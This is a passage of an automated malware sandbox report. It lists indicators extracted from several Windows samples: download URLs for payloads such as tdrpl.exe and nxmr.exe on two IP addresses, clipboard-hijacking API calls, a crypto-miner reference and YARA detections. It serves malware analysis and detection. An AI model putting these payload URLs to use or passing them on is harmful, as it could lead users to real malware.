                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:28:23 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: Us051y7j25.exe, 00000000.00000003.2341074992.00000000008F1000.00000004.00000020.00020000.00000000.sdmp, 21324.scr, 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 21324.scr, 00000003.00000000.2346481586.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 21324.scr, 00000003.00000003.2367229368.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000000.2367149756.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000750000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000012.00000000.2471335406.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://185.215.113.66/
                                Source: sysppvrdnvs.exe, 00000004.00000003.2445858341.0000000000726000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000003.2480886965.0000000000734000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000003.2445858341.0000000000734000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000003.2480886965.0000000000725000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1
                                Source: sysppvrdnvs.exe, 00000004.00000003.2445858341.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1$
                                Source: sysppvrdnvs.exe, 00000004.00000003.2480886965.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/17.36C:
                                Source: sysppvrdnvs.exe, 00000004.00000003.2480886965.0000000000734000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000003.2445858341.0000000000734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1C:
                                Source: sysppvrdnvs.exe, 00000004.00000003.2445858341.0000000000726000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000003.2480886965.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1E
                                Source: sysppvrdnvs.exe, 00000004.00000003.2480886965.0000000000734000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1FR
                                Source: sysppvrdnvs.exe, 00000004.00000003.2480886965.0000000000734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1MR
                                Source: sysppvrdnvs.exe, 00000004.00000003.2480886965.0000000000734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1_R
                                Source: sysppvrdnvs.exe, 00000004.00000003.2445858341.0000000000726000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000003.2480886965.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1t
                                Source: sysppvrdnvs.exe, 00000004.00000003.2480886965.0000000000734000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1tR
                                Source: sysppvrdnvs.exe, 00000004.00000003.2445858341.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1x
                                Source: sysppvrdnvs.exe, 00000004.00000003.2480886965.0000000000734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1zR
                                Source: sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2
                                Source: sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2t
                                Source: sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2zR
                                Source: sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3
                                Source: Us051y7j25.exe, 00000000.00000003.2341074992.00000000008F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3405117-2476756634-1003$
                                Source: sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3_R
                                Source: sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000793000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/4
                                Source: sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/4C:
                                Source: sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/4MMC:
                                Source: sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000750000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/5
                                Source: sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/5C:
                                Source: sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/5aR-
                                Source: sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/5hR&
                                Source: 21324.scr, 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 21324.scr, 00000003.00000000.2346481586.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 21324.scr, 00000003.00000003.2367229368.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000000.2367149756.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000012.00000000.2471335406.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%s
                                Source: 2314627202.exe, 0000001A.00000002.2688482531.0000000000872000.00000002.00000001.01000000.0000000A.sdmp, 2314627202.exe, 0000001A.00000000.2647768559.0000000000872000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://185.215.113.66/reg.php?s=%s
                                Source: 2314627202.exe, 0000001A.00000002.2688482531.0000000000872000.00000002.00000001.01000000.0000000A.sdmp, 2314627202.exe, 0000001A.00000000.2647768559.0000000000872000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://185.215.113.66/reg.php?s=%sMozilla/5.0
                                Source: sysppvrdnvs.exeString found in binary or memory: http://185.215.113.66/tdrp.exe
                                Source: 21324.scr, 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 21324.scr, 00000003.00000000.2346481586.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 21324.scr, 00000003.00000003.2367229368.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000000.2367149756.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000012.00000000.2471335406.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://185.215.113.66/tdrp.exe%s:Zone.Identifier/c
                                Source: Us051y7j25.exe, 00000000.00000003.2341630604.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, Us051y7j25.exe, 00000000.00000002.2346965220.00000000008EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/tdrpl.exe
                                Source: Us051y7j25.exe, 00000000.00000003.2341630604.00000000008EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/tdrpl.exe2
                                Source: Us051y7j25.exe, 00000000.00000003.2341698411.0000000000913000.00000004.00000020.00020000.00000000.sdmp, Us051y7j25.exe, 00000000.00000003.2341074992.000000000090E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/tdrpl.exeC:
                                Source: Us051y7j25.exe, 00000000.00000003.2341074992.00000000008F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/tdrpl.exeLMEM
                                Source: Us051y7j25.exe, 00000000.00000003.2341630604.00000000008B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/tdrpl.exeUUC:
                                Source: Us051y7j25.exe, 00000000.00000003.2341630604.00000000008EC000.00000004.00000020.00020000.00000000.sdmp, Us051y7j25.exe, 00000000.00000002.2346965220.00000000008EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/tdrpl.exel
                                Source: Us051y7j25.exe, 00000000.00000003.2341630604.00000000008DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/tdrpl.exen
                                Source: Us051y7j25.exe, 00000000.00000003.2341074992.00000000008F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/tdrpl.exeystem32
                                Source: Us051y7j25.exe, 00000000.00000003.2341074992.00000000008F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/ws
                                Source: 1091722296.exe, 0000001B.00000002.2814772306.0000000001253000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/
                                Source: 1091722296.exe, 0000001B.00000002.2814772306.0000000001253000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/U
                                Source: 1091722296.exe, 1091722296.exe, 0000001B.00000002.2814772306.000000000123E000.00000004.00000020.00020000.00000000.sdmp, 1091722296.exe, 0000001B.00000002.2814772306.0000000001253000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/nxmr.exe
                                Source: 1091722296.exe, 0000001B.00000002.2814772306.000000000123E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/nxmr.exeF
                                Source: 1091722296.exe, 0000001B.00000002.2814772306.000000000123E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/nxmr.exeH
                                Source: 1091722296.exe, 0000001B.00000002.2814772306.000000000123E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/nxmr.exeM
                                Source: sysppvrdnvs.exe, 00000004.00000002.3519879105.0000000002E53000.00000004.00000020.00020000.00000000.sdmp, 1091722296.exe, 0000001B.00000000.2731715048.0000000000602000.00000002.00000001.01000000.0000000B.sdmp, 1091722296.exe, 0000001B.00000002.2811517821.0000000000602000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://185.215.113.84/nxmr.exeP0
                                Source: 1091722296.exe, 0000001B.00000002.2814772306.0000000001253000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/nxmr.exep
                                Source: 21324.scr, 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 21324.scr, 00000003.00000000.2346481586.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 21324.scr, 00000003.00000003.2367229368.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000000.2367149756.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000012.00000000.2471335406.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 146916724.exe, 0000001D.00000002.2876135463.0000000000BEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/
                                Source: sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141//Rg
                                Source: sysppvrdnvs.exe, 00000004.00000002.3520183951.0000000002F9C000.00000004.00000010.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000750000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1
                                Source: sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2
                                Source: sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2MR
                                Source: sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/3
                                Source: sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/4#
                                Source: sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/4r
                                Source: sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/5
                                Source: 146916724.exe, 0000001D.00000002.2876135463.0000000000BEB000.00000004.00000020.00020000.00000000.sdmp, 146916724.exe, 0000001D.00000002.2876135463.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/ALLBSTATAASASD
                                Source: 146916724.exe, 0000001D.00000002.2876135463.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/ALLBSTATAASASD1
                                Source: 146916724.exe, 0000001D.00000002.2876135463.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/ALLBSTATAASASD?
                                Source: 146916724.exe, 0000001D.00000002.2876135463.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/ALLBSTATAASASDH
                                Source: sysppvrdnvs.exe, 00000004.00000002.3525303582.0000000004B40000.00000004.00000020.00020000.00000000.sdmp, 146916724.exe, 0000001D.00000000.2817112808.0000000000C92000.00000002.00000001.01000000.0000000D.sdmp, 146916724.exe, 0000001D.00000002.2876438869.0000000000C92000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://91.202.233.141/ALLBSTATAASASDMozilla/5.0
                                Source: 146916724.exe, 0000001D.00000002.2876135463.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/ALLBSTATAASASDO
                                Source: 2314627202.exe, 0000001A.00000002.2688482531.0000000000872000.00000002.00000001.01000000.0000000A.sdmp, 2314627202.exe, 0000001A.00000000.2647768559.0000000000872000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://91.202.233.141/TLOADEDBROMozilla/5.0
                                Source: sysppvrdnvs.exe, 00000004.00000002.3515115127.00000000006D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/der
                                Source: sysppvrdnvs.exe, 00000004.00000002.3515115127.00000000006D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/tography
                                Source: winupsecvmgr.exe, 00000022.00000002.3142710101.00007FF7AD1CB000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                                Source: winupsecvmgr.exe, 00000022.00000002.3142710101.00007FF7AD1CB000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
                                Source: winupsecvmgr.exe, 00000022.00000002.3142710101.00007FF7AD1CB000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                                Source: winupsecvmgr.exe, 00000022.00000002.3142710101.00007FF7AD1CB000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                                Source: powershell.exe, 0000001E.00000002.2929967156.0000025221970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m5
                                Source: powershell.exe, 0000001E.00000002.2937786376.0000025221AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                                Source: powershell.exe, 0000001E.00000002.2924839612.000002521948A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3096620237.0000015D9006A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                Source: powershell.exe, 00000023.00000002.3020507274.0000015D80229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                Source: sysppvrdnvs.exe, 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmp, powershell.exe, 0000001E.00000002.2891902429.0000025209649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3020507274.0000015D80229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                Source: sysppvrdnvs.exe, 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                                Source: powershell.exe, 0000001E.00000002.2891902429.0000025209421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3020507274.0000015D80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: powershell.exe, 0000001E.00000002.2891902429.0000025209649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3020507274.0000015D80229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                Source: powershell.exe, 00000023.00000002.3020507274.0000015D80229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                Source: powershell.exe, 00000023.00000002.3113150538.0000015DF3020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                                Source: powershell.exe, 0000001E.00000002.2936923038.0000025221A92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.t.com/pk
                                Source: powershell.exe, 0000001E.00000002.2891902429.0000025209421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3020507274.0000015D80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                Source: powershell.exe, 00000023.00000002.3020507274.0000015D80229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                                Source: powershell.exe, 00000023.00000002.3096620237.0000015D9006A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                Source: powershell.exe, 00000023.00000002.3096620237.0000015D9006A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                Source: powershell.exe, 00000023.00000002.3096620237.0000015D9006A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                Source: powershell.exe, 00000023.00000002.3020507274.0000015D80229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                Source: Us051y7j25.exe, 00000000.00000003.2341074992.00000000008F1000.00000004.00000020.00020000.00000000.sdmp, Us051y7j25.exe, 00000000.00000002.2346965220.00000000008EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                                Source: powershell.exe, 0000001E.00000002.2924839612.000002521948A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3096620237.0000015D9006A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                Source: winupsecvmgr.exe, 00000022.00000002.3142710101.00007FF7AD1CB000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_00404970
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_00404970
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,4_2_00404970
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 18_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,18_2_00404970
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_004059B0 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,3_2_004059B0
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_004059B0 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,3_2_004059B0

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Source: Yara matchFile source: 4.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.21324.scr.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.0.21324.scr.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000012.00000000.2471335406.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.2367149756.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000000.2346481586.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.2367229368.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: 21324.scr PID: 4416, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: sysppvrdnvs.exe PID: 1588, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: sysppvrdnvs.exe PID: 4492, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\21324.scr, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\tdrpl[1].exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\sysppvrdnvs.exe, type: DROPPED

